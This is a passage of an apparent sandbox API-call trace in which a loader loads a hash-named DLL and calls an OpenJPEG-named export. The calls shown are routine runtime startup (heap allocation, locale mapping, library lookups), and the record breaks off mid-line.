os_tid = 0xed8 [0227.665] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.665] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0227.665] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.665] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0227.665] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0227.666] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0227.666] GetProcessHeap () returned 0x4e0000 [0227.666] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0227.666] GetLastError () returned 0x7e [0227.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0227.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0227.667] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c8) returned 0x4ec320 [0227.667] SetLastError (dwErrCode=0x7e) [0227.667] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1200) returned 0x4f3470 [0227.668] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0227.668] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0227.668] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0227.668] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0227.668] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_index" [0227.668] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_index" [0227.668] GetACP () returned 0x4e4 [0227.668] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x228) returned 0x4e5380 [0227.668] IsValidCodePage (CodePage=0x4e4) returned 1 [0227.669] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0227.669] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0227.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0227.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0227.669] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0227.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0227.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0227.669] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.669] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0227.669] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0227.669] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0227.669] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0227.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0227.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0227.669] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0227.669] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0227.669] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0227.669] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x100) returned 0x4f2280 [0227.669] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0227.669] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x178) returned 0x4e9aa0 [0227.669] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0227.670] GetLastError () returned 0x0 [0227.670] SetLastError (dwErrCode=0x0) [0227.670] GetEnvironmentStringsW () returned 0x4f4680* [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x9cc) returned 0x4f5060 [0227.670] FreeEnvironmentStringsW (penv=0x4f4680) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x118) returned 0x4ea590 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3e) returned 0x4f0ea0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x5c) returned 0x4e0780 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x62) returned 0x4e47a0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x78) returned 0x4ec6f0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x62) returned 0x4e5a40 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x28) returned 0x4eb500 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x4f0770 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1a) returned 0x4eb800 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3a) returned 0x4f0950 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x62) returned 0x4e4510 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2a) returned 0x4ec770 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4e4810 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1c) returned 0x4eb860 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xd2) returned 0x4e5cd0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x7c) returned 0x4e4000 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3a) returned 0x4f0540 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x90) returned 0x4e3c20 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x4eb530 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4e4580 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x36) returned 0x4e5ab0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x4f09a0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x4e9620 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x4f01d0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xd6) returned 0x4e5610 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4e20d0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1e) returned 0x4eb6e0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2c) returned 0x4e2110 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x54) returned 0x4e93e0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x4e90e0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x4eb5c0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x42) returned 0x4effa0 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2c) returned 0x4e2150 [0227.670] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x44) returned 0x4f03b0 [0227.671] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x4eb8c0 [0227.671] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5060 | out: hHeap=0x4e0000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1000) returned 0x4f4680 [0227.671] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0227.671] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0227.671] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_index" [0227.671] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_index", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x4e9770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0227.672] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0227.674] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.674] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0227.674] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.675] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0227.675] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0227.675] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.675] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0227.676] GetProcessHeap () returned 0x4e0000 [0227.676] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.676] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0227.676] GetLastError () returned 0x0 [0227.676] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0227.676] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0227.676] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c8) returned 0x4f5b10 [0227.676] SetLastError (dwErrCode=0x0) [0227.676] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1200) returned 0x4f5ee0 [0227.678] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0227.678] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0227.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0227.678] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0227.678] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_index" [0227.678] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" 